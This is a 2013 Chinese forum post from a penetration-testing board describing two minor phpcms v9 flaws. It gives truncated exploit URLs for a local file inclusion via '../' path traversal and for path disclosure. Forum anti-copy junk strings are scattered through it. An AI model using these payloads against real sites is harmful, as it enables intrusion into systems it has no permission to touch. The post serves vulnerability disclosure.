中国网络渗透测试联盟

标题: phpcms v9两个鸡肋漏洞 [打印本页]
作者: admin    时间: 2013-4-4 17:28
标题: phpcms v9两个鸡肋漏洞
我就不贴代码了,有兴趣的自己跟一下吧,说不定可以发现更多。5 P6 g( d% S4 O% Z
% p. X8 g) M9 c& r
Exp: http://www.php0day.com/api.php?o ... efile=../../../fuck
! r6 Q, ]$ E9 h" \$ o1 k4 F8 a, a9 A4 X% V  v: m
#包含根目录的fuck.cache.php 又一鸡肋。包含其他文件自己截断吧,看你运气了。' C  P% y; g! G$ ^+ l$ V: N
5 o! Z) G8 a1 }
Exp: http://www.php0day.com/phpcms/mo ... l.php?author=b4dboy
( E2 J+ f8 ?: b" ]
2 s- b! Q0 F+ H  S#暴路径
$ U9 \3 Y/ S* L# M8 }  Z5 A
% O7 Z1 y- v# ~8 f2 ~; j注:请遵守国家相关法律,请勿非法入侵,产生任何后果自己负责。9 g: A1 k6 W$ f) }
/ x+ ?8 l- x: m! [8 v5 o
  }9 u; D* l& W& L! k. }0 F# j
/ `) e& p4 c* {" X/ a: U
+1



欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2